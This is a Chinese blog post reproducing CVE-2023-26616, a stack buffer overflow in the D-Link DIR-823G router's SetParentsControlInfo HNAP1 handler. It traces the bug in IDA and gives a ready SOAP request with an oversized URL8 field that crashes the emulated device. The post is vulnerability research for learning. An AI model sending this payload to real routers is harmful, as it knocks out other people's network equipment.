DIR-823G漏洞复现 (CVE-2023-26616)

已于 2023-11-15 11:15:02 修改
阅读量231 收藏
点赞数
文章标签: iot 安全 网络安全
于 2023-11-15 10:25:10 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cz010822/article/details/134414297
版权

漏洞描述

D-Link DIR-823G firmwareversion 1.02B05 has a buffer overflow vulnerability, which originates from the URL field in SetParentsControlInfo.

漏洞复现工具

虚拟机:Ubuntu18.04

固件版本:DIR823G_V1.0.2B05_20181207.bin

工具:FirmAE、binwalk、ida

模拟路由环境

FirmAE仿真路由环境

sudo ./run.sh -r LBT /home/ccc/DIR859Ax_FW105b03.bin

1699952347_655336db49deb203ef72b.png!small?1699952346695

漏洞分析

根据CVE漏洞描述来源SetParentsControlInfo中的URL变量,在固件中搜索字符串,发现SetParentsControlInfo出现在goahead文件中,放入IDA中反汇编

1699952557_655337ada13cc8475edd6.png!small?1699952557253

搜索URL字符串,查看引用函数

1699952928_655339204c4b4820dd9c9.png!small?1699952927834

对引用的函数逐个查看,发现栈溢出发生在sub_469F78函数

1699954092_65533dacb0948a123f2ad.png!small?1699954092036

查看sub_469F78函数,分析发现栈溢出由于使用strncpy,V104-V111字符数组长度64,分别存储URL1-URL8,URL1-URL8的长度未进行限制,因此发生溢出

1699955354_6553429a6ff8ade156463.png!small?1699955354008

1699955464_655343088b035c9564731.png!small?1699955463794

由此反向推断函数调用链为:main()->sub_423F90()->sub_42383C()->(LOAD段)sub_46B6E8->sub_469F78

main函数调用sub_423F90,通过sub_423F90返回值进行判断。sub_423F90调用sub_42383C进行/HNAP1请求的处理

1699956158_655345bebdabe2d67c734.png!small?1699956158201

sub_42383C调用off_588D80表中的内容进行比对,off_588D80表中存储的函数对应的动作,sub_46B6E8位于该表中

1699956320_655346604643fcd3e23f4.png!small?1699956319783

sub_46B6E8函数即为SetParentsControlInfo函数

1699956452_655346e4ef4ef3097125c.png!small?1699956452256

1699956500_6553471418537e3058dc1.png!small?1699956499341

该漏洞通过请求头设置SetParentsControlInfo动作触发该调用链,造成栈溢出

漏洞复现

Poc

1. 编写python脚本验证

2. 使用火狐浏览器对请求包进行编辑重发进行漏洞验证,依次点击火狐浏览器的开发者工具->Network->192.168.0.1/HNAP1/(任意一个HNAP1都可以)->Resend(右上角)

1699961762_65535ba218b665e9a8912.png!small?1699961762883

然后更改New Request界面下的SOAPAction和Body内容,如下,难后点击Send验证漏洞效果

1."http://purenetworks.com/HNAP1/SetParentsControlInfo"
2.<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><SetParentsControlInfo xmlns="http://purenetworks.com/HNAP1/"><UsersInfo><HostName>1</HostName><Mac>1</Mac><IndexEnable>1</IndexEnable><StartTime>00:00:00</StartTime><EndTime>23:59:00</EndTime><Week>Sun</Week><UrlEnable>1</UrlEnable><URL1>cp.com</URL1><URL2></URL2><URL3></URL3><URL4></URL4><URL5></URL5><URL6></URL6><URL7></URL7><URL8>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</URL8><GroupId>1</GroupId></UsersInfo></SetParentsControlInfo></soap:Body></soap:Envelope>

1699961491_65535a93c7cc5a5d846b0.png!small?1699961492249

1700014780_65542abc387f4d8803b7f.png!small?1700014781242

路由环境崩了,说明漏洞验证成功

_Dream_C
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
DIR-823G A1 V1.02.rar
02-17
硬件参数 RTL8367RB+RTL8197FS+RTL8812BRH 存储器容量 16M
物联网安全实战从零开始-CVE-2019-1762
ZetaByte的博客
08-16 423
本环境是蛇矛实验室基于"火天网演攻防演训靶场"进行搭建,通过火天网演中的环境构建模块,可以灵活的对目标网络进行设计和配置,并且可以快速进行场景搭建和复现验证工作。
DIR-859漏洞复现CVE-2019-20215)
CZ010822的博客
10-11 159
查看ssdpcgi_main,获取环境变量,并判断是否带单引号,我们可以构造的环境变量时ST,即V2,可以在V2中添加待执行的命令,需满足V2开始为urn:或uuid:。发送ssdp:discover数据包,使main函数调用ssdpgi_main。函数结束时会执行V2字符串中包含的命令,V2由传入参数构成。(应该是lxmldbc_system(v2),软件问题)固件版本:DIR859Ax_FW105b03.bin。工具:FirmAE、binwalk、ida。虚拟机:Ubuntu18.04。
路由仿真环境-FirmAE安装指南2024(IOT入门)
一个啥也不会的小菜鸡!
05-25 1245
运行完上面的后就可以运行install.sh脚本了!,之前配置失败是因为没有配置好python环境这次提前配置了,所以就没啥问题了!download.sh脚本主要是下载一写github上的一些文件,脚本下载的不好可以手动下载后放到。注:我是用的Ubuntu基本啥也没装,这个框架会有概率扰乱原有环境!还出了一个bug无法进行联网,我只能说我不理解,菜鸟一枚QAQ。发现这次提交是他们写教程时最新的提交!第一次尝试以失败告终,肝到我凌晨4点!这是一个我经常用的环境,用来打Pwn。开启代理后速度嗖嗖的快!
DIR823G_V1.0.2B05_20181207.bin
02-17
DIR823G升级
D-link DIR-823G(CVE-2023-26616)漏洞复现
The54No1的博客
09-15 318
main函数调用sub_423F90,通过sub_423F90返回值进行判断。分析发现栈溢出由于使用strncpy,V64-V71字符数组长度64,分别存储URL1-URL8,URL1-URL8的长度未进行限制,因此发生溢出。main->sub_423F90->sub_42383C->(LOAD段)sub_46B6E8->sub_469F78。sub_42383C调用off_588D80表中的内容进行比对,off_588D80表中存储的函数对应的动作,sub_46B6E8位于该表中。
D-Link DIR-823G(CVE-2023-26612)漏洞复现
The54No1的博客
09-15 451
根据CVE漏洞描述来源SetParentsControlInfo中的HostName变量,在固件中搜索SetParentsControlInfo,发现goahead文件,放入IDA中反汇编。main->sub_423F90->sub_42383C->(LOAD段)sub_46B6E8->sub_469F78。sub_42383C调用off_588D80表中的内容进行比对,off_588D80表中存储的函数对应的动作,sub_46B6E8位于该表中。• 工具:IDA、binwalk、Firmadyne。
CVE-2023-46604- RCE漏洞复现
2301_80115097的博客
11-16 3504
执行上述清理操作后过2分钟再次弹出安全告警,发现服务器再次生成configs.conf文件以及ksoftirqd/0进程,怀疑守护进程未全部清理干净,再次进行检查,发现存在多个守护进程ksoftirqd/0。虽然AMQ的61616端口依然开着,但几天未收到告警,本以为攻击者已经遗忘了我们公司,结果下午收到阿里云封禁服务器的通知,原因是服务器对外进行了DDOS攻击。由于云安全中心没有提示【拦截成功】,且该云账号的云安全中心为免费版,我们认为攻击者大概率入侵成功,必须立刻启动应急响应。
WebLogic 任意文件上传(CVE-2018-2894)漏洞复现
橘子女侠
07-23 1412
WebLogic 任意文件上传(CVE-2018-2894)漏洞复现 一、漏洞概述 1、漏洞编号:CVE-2018-2894 2、漏洞描述:Weblogic管理端未授权的两个页面存在任意上传getshell漏洞,可直接获取权限。 Oracle 7月更新中,修复了Weblogic Web Service Test Page中一处任意文件上传漏洞,Web Service Test Page 在...
[系统安全] 二十二.PE数字签名之(下)微软证书漏洞CVE-2020-0601复现及Windows验证机制分析
杨秀璋的专栏
02-17 1万+
作者前文介绍了什么是数字签名,利用Asn1View、PEVie、010Editor等工具进行数据提取和分析,这是全网非常新的一篇文章,希望对您有所帮助。这篇文章将详细介绍微软证书漏洞CVE-2020-0601,并讲解ECC算法、Windows验证机制,复现可执行文件签名证书的例子。 这些基础性知识不仅和系统安全相关,同样与我们身边常用的软件、文档、操作系统紧密联系,希望这些知识对您有所帮助,更希望大家提高安全意识,安全保障任重道远。本文参考了参考文献中的文章,并结合自己的经验和实践进行撰写,也推荐大家阅读参
WebLogic Server 远程代码执行漏洞复现 (CVE-2023-21839)
0xSec
02-11 5414
WebLogic存在远程代码执行漏洞,该漏洞允许未经身份验证的远程攻击者通过T3/IIOP协议网络访问并破坏易受攻击的WebLogic服务器,成功利用此漏洞可能导致Oracle WebLogic服务器被接管或敏感信息泄露。
漏洞复现—Weblogic CVE-2017-10271/CVE-2018-2628/CVE-2018-2894/CVE-2020-14882/ssrf/weak_password
weixin_45556536的博客
11-27 2024
这里写目录标题基础知识漏洞原理涉及版本漏洞特征漏洞复现CVE-2017-10271 'wls-wsat' XMLDecoder 反序列化漏洞CVE-2018-2628 Weblogic T3协议反序列化漏洞CVE-2018-2894 Weblogic任意文件上传漏洞CVE-2020-14882 weblogic 未授权命令执行漏洞漏洞修复 基础知识 Weblogic是oracle推出的application server,由于其具有支持EJB、JSP、JMS、XML等多种语言、可扩展性、快速开发等多种特性
OpenSSH_8.3-命令注入漏洞攻击与修复
weixin_48684274的博客
10-23 7620
OpenSSH_8.3及以下-命令注入漏洞攻击与修复 2020年6月9日发现漏洞,2020年7月18日公开漏洞。 攻击原理 使用SCP中远程功能进行命令注入。 漏洞复现要求 OpenSSH版本 =<8.3p1 ssh连接密码 攻击环境 攻击方:kali:192.168.0.130 靶机: CentOS7:192.168.0.187 攻击测试 kali: 上传任意文件到靶机上,文件允许为空,因为上传的文件不是主角。而是``里面的命令作为注入点进行攻击。 scp dic.txt root@192.1
Dlink DIR-823G 漏洞挖掘过程
weixin_30617561的博客
10-08 1070
前言 本文由 本人 首发于 先知安全技术社区: https://xz.aliyun.com/u/5274 初步分析 首先下载固件 https://gitee.com/hac425/blog_data/blob/master/iot/DIR823GA1_FW102B03.bin 用 binwalk 解开固件 发现这是一个 squashfs 文件系统,里面是标准的 linux 目录结构,所以这个固...
D-LINK DIR823PRO 路由器更新固件为openwrt-18.06.1 支持802.11s组建mesh
lang999888的专栏
03-05 6554
D-LINK DIR823PRO路由器是双频千兆路由器,芯片为mtk7628an+mtk7612en,16M闪存,64M内存。 原厂固件版本较旧,很多协议不支持,比如802.11s组建mesh网络。 这里记录如何刷写openwrt18.06.1版本的固件。openwrt-ramips-mt76x8-dir-823pro-squashfs-sysupgrade.bin 下载地址 https:/...
D-Link DIR-823G v1.02 B05命令注入漏洞
zzgslh的博客
03-31 2320
【前言】 闲来无事,看看这个D-Link的命令注入漏洞漏洞详情】 D-Link DIR-823G v1.02 B05及之前的版本存在命令注入漏洞,攻击者可以通过POST的方式往 /HNAP1发送精心构造的请求,执行任意的操作系统命令。 【验证工具】 mitmproxy代理工具 【验证详情】 验证过程 1.访问http://192.168.0.1,可以看到D-Link的登录页...
USB PD v1.0快速充电通信原理
热门推荐
汽车以太网和SOA
11-02 2万+
USB PD v1.0快速充电通信原理
【盖世汽车-注册安全分析报告】
最新发布
09-02 1345
盖世汽车(上海盖世网络技术有限公司)是汽车产业专业的信息服务平台,为企业及行业人士提供一站式服务。
CVE-2023-20198漏洞复现
08-01
CVE-2023-20198是一个安全漏洞的编号,通常涉及软件存在的某种安全风险。复现漏洞是指通过编写特定的测试代码或脚本,重现该漏洞的行为以验证其存在。这个过程需要对漏洞的技术细节有深入理解,包括漏洞利用原理、...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值